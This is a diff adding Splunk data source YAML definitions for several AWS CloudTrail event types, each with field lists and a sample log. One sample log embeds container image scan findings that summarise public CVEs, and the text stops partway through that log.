+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.changeToken
+- requestParameters.webACLId
+- responseElements.changeToken
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+  "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:32:54Z", "eventSource": "waf.amazonaws.com",
+  "eventName": "DeleteWebACL", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185",
+  "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+  command/waf.delete-web-acl", "requestParameters": {"changeToken": "11eb19d6-d960-4398-8761-6a8fbf8fc425",
+  "webACLId": "6a9771ff-7d94-4fec-a049-e42da0bc7347"}, "responseElements": {"changeToken":
+  "11eb19d6-d960-4398-8761-6a8fbf8fc425"}, "requestID": "55fd5189-5f86-4052-8e8e-993faf1753e8",
+  "eventID": "c8fd51ac-676d-4d5d-aa5a-7e642cf5bb97", "readOnly": false, "eventType":
+  "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_describeeventaggregates.yml b/data_sources/aws_cloudtrail_describeeventaggregates.yml
new file mode 100644
index 0000000000..63a8197dbe
--- /dev/null
+++ b/data_sources/aws_cloudtrail_describeeventaggregates.yml
@@ -0,0 +1,97 @@
+name: AWS CloudTrail DescribeEventAggregates
+id: 7efe4afe-62ae-4f96-81d1-76598ea37fc2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DescribeEventAggregates
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.aggregateField
+- requestParameters.filter.eventStatusCodes{}
+- requestParameters.filter.startTimes{}.from
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+  "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527",
+  "accessKeyId": "ASIASBMSCQHHQQ6LB24V", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+  {}, "attributes": {"creationDate": "2023-01-31T21:58:17Z", "mfaAuthenticated": "true"}}},
+  "eventTime": "2023-02-01T02:52:34Z", "eventSource": "health.amazonaws.com", "eventName":
+  "DescribeEventAggregates", "awsRegion": "us-east-1", "sourceIPAddress": "54.188.0.152",
+  "userAgent": "AWS Internal", "requestParameters": {"aggregateField": "eventTypeCategory",
+  "filter": {"eventStatusCodes": ["open", "upcoming"], "startTimes": [{"from": "Jan
+  25, 2023 2:54:32 AM"}]}}, "responseElements": null, "requestID": "d6adf050-1d7a-4c25-9d48-0319e33f6f9a",
+  "eventID": "201cee69-61ab-4ffb-80b7-bd31e81e0d82", "readOnly": true, "eventType":
+  "AwsApiCall", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory":
+  "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_describeimagescanfindings.yml b/data_sources/aws_cloudtrail_describeimagescanfindings.yml
new file mode 100644
index 0000000000..7f7ac31579
--- /dev/null
+++ b/data_sources/aws_cloudtrail_describeimagescanfindings.yml
@@ -0,0 +1,895 @@
+name: AWS CloudTrail DescribeImageScanFindings
+id: 688ea789-9ba2-4970-90a2-17e541e273c9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DescribeImageScanFindings
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.imageId.imageDigest
+- requestParameters.maxResults
+- requestParameters.repositoryName
+- responseElements.imageId.imageDigest
+- responseElements.imageScanFindings.findingSeverityCounts.HIGH
+- responseElements.imageScanFindings.findingSeverityCounts.INFORMATIONAL
+- responseElements.imageScanFindings.findingSeverityCounts.LOW
+- responseElements.imageScanFindings.findingSeverityCounts.MEDIUM
+- responseElements.imageScanFindings.findingSeverityCounts.UNDEFINED
+- responseElements.imageScanFindings.findings{}.attributes{}.key
+- responseElements.imageScanFindings.findings{}.attributes{}.value
+- responseElements.imageScanFindings.findings{}.description
+- responseElements.imageScanFindings.findings{}.name
+- responseElements.imageScanFindings.findings{}.severity
+- responseElements.imageScanFindings.findings{}.uri
+- responseElements.imageScanFindings.imageScanCompletedAt
+- responseElements.imageScanFindings.vulnerabilitySourceUpdatedAt
+- responseElements.imageScanStatus.description
+- responseElements.imageScanStatus.status
+- responseElements.registryId
+- responseElements.repositoryName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AAAAAAAAAAAAAAAAAAAAA:test@test.com", "arn": "arn:aws:sts::111111111111:assumed-role/role_name/test@test.com",
+  "accountId": "111111111111", "accessKeyId": "AKIAIOSFODNN7EXAMPLE", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AKIAIOSFODNN7EXAMPLE", "arn":
+  "arn:aws:iam::111111111111:role/aws-reserved/test/region/group", "accountId": "111111111111",
+  "userName": "test"}, "webIdFederationData": {}, "attributes": {"creationDate": "2021-08-11T09:42:53Z",
+  "mfaAuthenticated": "false"}}}, "eventTime": "2021-08-11T11:52:27Z", "eventSource":
+  "ecr.amazonaws.com", "eventName": "DescribeImageScanFindings", "awsRegion": "eu-central-1",
+  "sourceIPAddress": "154.16.165.133", "userAgent": "aws-internal/3 aws-sdk-java/1.11.1030
+  Linux/4.9.273-0.1.ac.226.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08
+  java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/legacy", "requestParameters":
+  {"repositoryName": "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"},
+  "maxResults": 1000}, "responseElements": {"registryId": "111111111111", "repositoryName":
+  "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"},
+  "imageScanStatus": {"status": "COMPLETE", "description": "The scan was completed
+  successfully."}, "imageScanFindings": {"imageScanCompletedAt": "Aug 11, 2021, 11:30:16
+  AM", "vulnerabilitySourceUpdatedAt": "Aug 11, 2021, 1:17:52 AM", "findings": [{"name":
+  "CVE-2019-25013", "description": "The iconv feature in the GNU C Library (aka glibc
+  or libc6) through 2.32, when processing invalid multi-byte input sequences in the
+  EUC-KR encoding, may have a buffer over-read.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-25013",
+  "severity": "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"},
+  {"key": "CVSS2_SCORE", "value": "7.1"}]}, {"name": "CVE-2021-33574", "description":
+  "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33
+  has a use-after-free. It may use the notification thread attributes object (passed
+  through its struct sigevent parameter) after it has been freed by the caller, leading
+  to a denial of service (application crash) or possibly unspecified other impact.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2021-33574", "severity":
+  "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+  "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-12886", "description":
+  "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c
+  in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate
+  instruction sequences when targeting ARM targets that spill the address of the stack
+  protector guard, which allows an attacker to bypass the protection of -fstack-protector,
+  -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit
+  against stack overflow by controlling what the stack canary is compared against.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2018-12886", "severity":
+  "MEDIUM", "attributes": [{"key": "package_version", "value": "8.3.0-6"}, {"key":
+  "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-1751", "description":
+  "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling
+  signal trampolines on PowerPC. Specifically, the backtrace function did not properly
+  check the array bounds when storing the frame address, resulting in a denial of
+  service or potential code execution. The highest threat from this vulnerability
+  is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1751",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:C"},
+  {"key": "CVSS2_SCORE", "value": "5.9"}]}, {"name": "CVE-2021-3326", "description":
+  "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier,
+  when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an
+  assertion in the code path and aborts the program, potentially resulting in a denial
+  of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3326",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-35942", "description":
+  "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or
+  read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted,
+  crafted pattern, potentially resulting in a denial of service or disclosure of information.
+  This occurs because atoi was used but strtoul should have been used to ensure correct
+  calculations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-35942",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "6.4"}]}, {"name": "CVE-2019-12904", "description":
+  "In Libgcrypt 1.8.4, the C implementation of AES is vulnerable to a flush-and-reload
+  side-channel attack because physical addresses are available to other processes.
+  (The C implementation is used on platforms where an assembly-language implementation
+  is unavailable.)", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12904",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"},
+  {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name":
+  "CVE-2017-6363", "description": "** DISPUTED ** In the GD Graphics Library (aka
+  LibGD) through 2.2.5, there is a heap-based buffer over-read in tiffWriter in gd_tiff.c.
+  NOTE: the vendor says \"In my opinion this issue should not have a CVE, since the
+  GD and GD2 formats are documented to be ''obsolete, and should only be used for
+  development and testing purposes.''\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-6363",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"},
+  {"key": "package_name", "value": "libgd2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-12290", "description":
+  "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490
+  Section 4.2 when converting A-labels to U-labels. This makes it possible in some
+  circumstances for one domain to impersonate another. By creating a malicious domain
+  that matches a target domain except for the inclusion of certain punycoded Unicode
+  characters (that would be discarded when converted first to a Unicode label and
+  then back to an ASCII label), arbitrary domains can be impersonated.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12290",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.0.5-1+deb10u1"},
+  {"key": "package_name", "value": "libidn2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13115", "description":
+  "In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange
+  in kex.c has an integer overflow that could lead to an out-of-bounds read in the
+  way packets are read from the server. A remote attacker who compromises a SSH server
+  may be able to disclose sensitive information or cause a denial of service condition
+  on the client system when a user connects to the server. This is related to an _libssh2_check_length
+  mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13115", "severity":
+  "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"}, {"key":
+  "package_name", "value": "libssh2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2016-9318", "description":
+  "libxml2 2.9.4 and earlier, as used in XMLSec 1.2.23 and earlier and other products,
+  does not offer a flag directly indicating that the current document may be read
+  but other files may not be opened, which makes it easier for remote attackers to
+  conduct XML External Entity (XXE) attacks via a crafted document.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9318",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"},
+  {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"},
+  {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-16932", "description":
+  "parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter
+  entities.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16932",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"},
+  {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-36309", "description":
+  "ngx_http_lua_module (aka lua-nginx-module) before 0.10.16 in OpenResty allows unsafe
+  characters in an argument when using the API to mutate a URI, or a request or response
+  header.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-36309", "severity":
+  "MEDIUM", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+  {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-14155", "description":
+  "libpcre in PCRE before 8.44 allows an integer overflow via a large number after
+  a (?C substring.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-14155",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2:8.39-12"},
+  {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-3843", "description":
+  "It was discovered that a systemd service that uses DynamicUser property can create
+  a SUID/SGID binary that would be allowed to run as the transient service UID/GID
+  even after the service is terminated. A local attacker may use this flaw to access
+  resources that will be owned by a potentially different service in the future, when
+  the UID/GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3843",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+  {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2019-3844", "description":
+  "It was discovered that a systemd service that uses DynamicUser property can get
+  new privileges through the execution of SUID binaries, which would allow to create
+  binaries owned by the service transient group with the setgid bit set. A local attacker
+  may use this flaw to access resources that will be owned by a potentially different
+  service in the future, when the GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3844",
+  "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+  {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2016-2781", "description":
+  "chroot in GNU coreutils, when used with --userspec, allows local users to escape
+  to the parent session via a crafted TIOCSTI ioctl call, which pushes characters
+  to the terminal''s input buffer.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-2781",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.30-3"},
+  {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name":
+  "CVE-2021-22898", "description": "curl 7.7 through 7.76.1 suffers from an information
+  disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in
+  libcurl, is used to send variable=content pairs to TELNET servers. Due to a flaw
+  in the option parser for sending NEW_ENV variables, libcurl could be made to pass
+  on uninitialized data from a stack based buffer to the server, resulting in potentially
+  revealing sensitive internal information to the server using a clear-text network
+  protocol.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22898",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"},
+  {"key": "package_name", "value": "curl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:N/A:N"},
+  {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name": "CVE-2019-15847", "description":
+  "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize
+  multiple calls of the __builtin_darn intrinsic into a single call, thus reducing
+  the entropy of the random number generator. This occurred because a volatile operation
+  was not specified. For example, within a single execution of a program, the output
+  of every __builtin_darn() call may be the same.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-15847",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.3.0-6"},
+  {"key": "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-1752", "description":
+  "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found
+  in the way the tilde expansion was carried out. Directory paths containing an initial
+  tilde followed by a valid username were affected by this issue. A local attacker
+  could exploit this flaw by creating a specially crafted path that, when processed
+  by the glob function, would potentially lead to arbitrary code execution. This was
+  fixed in version 2.32.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1752",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "3.7"}]}, {"name": "CVE-2020-6096", "description":
+  "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation
+  of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU
+  glibc implementation) with a negative value for the ''num'' parameter results in
+  a signed comparison vulnerability. If an attacker underflows the ''num'' parameter
+  to memcpy(), this vulnerability could lead to undefined behavior such as writing
+  to out-of-bounds memory and potentially remote code execution. Furthermore, this
+  memcpy() implementation allows for program execution to continue in scenarios where
+  a segmentation fault or crash should have occurred. The dangers occur in that subsequent
+  execution and iterations of this code will be executed with this corrupted data.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2020-6096", "severity":
+  "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+  "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-10029", "description":
+  "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer
+  during range reduction if an input to an 80-bit long double function contains a
+  non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to
+  sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2020-10029", "severity":
+  "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+  "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2020-27618", "description":
+  "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier,
+  when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388,
+  IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead
+  to an infinite loop in applications, resulting in a denial of service, a different
+  vulnerability from CVE-2016-10228.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-27618",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2016-10228", "description":
+  "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when
+  invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE)
+  along with the -c option, enters an infinite loop when processing invalid multi-byte
+  input sequences, leading to a denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-10228",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-19126", "description":
+  "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to
+  ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution
+  after a security transition, allowing local attackers to restrict the possible mapping
+  addresses for loaded libraries and thus bypass ASLR for a setuid program.", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2019-19126", "severity": "LOW",
+  "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+  "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:N/A:N"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-27645", "description":
+  "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6)
+  2.29 through 2.33, when processing a request for netgroup lookup, may crash due
+  to a double-free, potentially resulting in degraded service or Denial of Service
+  on the local system. This is related to netgroupcache.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-27645",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+  {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2019-14855", "description":
+  "A flaw was found in the way certificate signatures could be forged using collisions
+  found in the SHA-1 algorithm. An attacker could use this weakness to create forged
+  certificate signatures. This issue affects GnuPG versions before 2.2.18.", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2019-14855", "severity": "LOW",
+  "attributes": [{"key": "package_version", "value": "2.2.12-1+deb10u1"}, {"key":
+  "package_name", "value": "gnupg2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13627", "description":
+  "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic
+  library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions
+  fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13627",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"},
+  {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:L/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name":
+  "CVE-2018-14553", "description": "gdImageClone in gd.c in libgd 2.1.0-rc2 through
+  2.2.5 has a NULL pointer dereference allowing attackers to crash an application
+  via a specific function call sequence. Only affects PHP when linked with an external
+  libgd (not bundled).", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14553",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"},
+  {"key": "package_name", "value": "libgd2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-36086", "description":
+  "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission
+  (called from cil_reset_classperms_set and cil_reset_classperms_list).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36086",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"},
+  {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36085", "description":
+  "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms
+  (called from __verify_map_perm_classperms and hashtab_map).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36085",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"},
+  {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36087", "description":
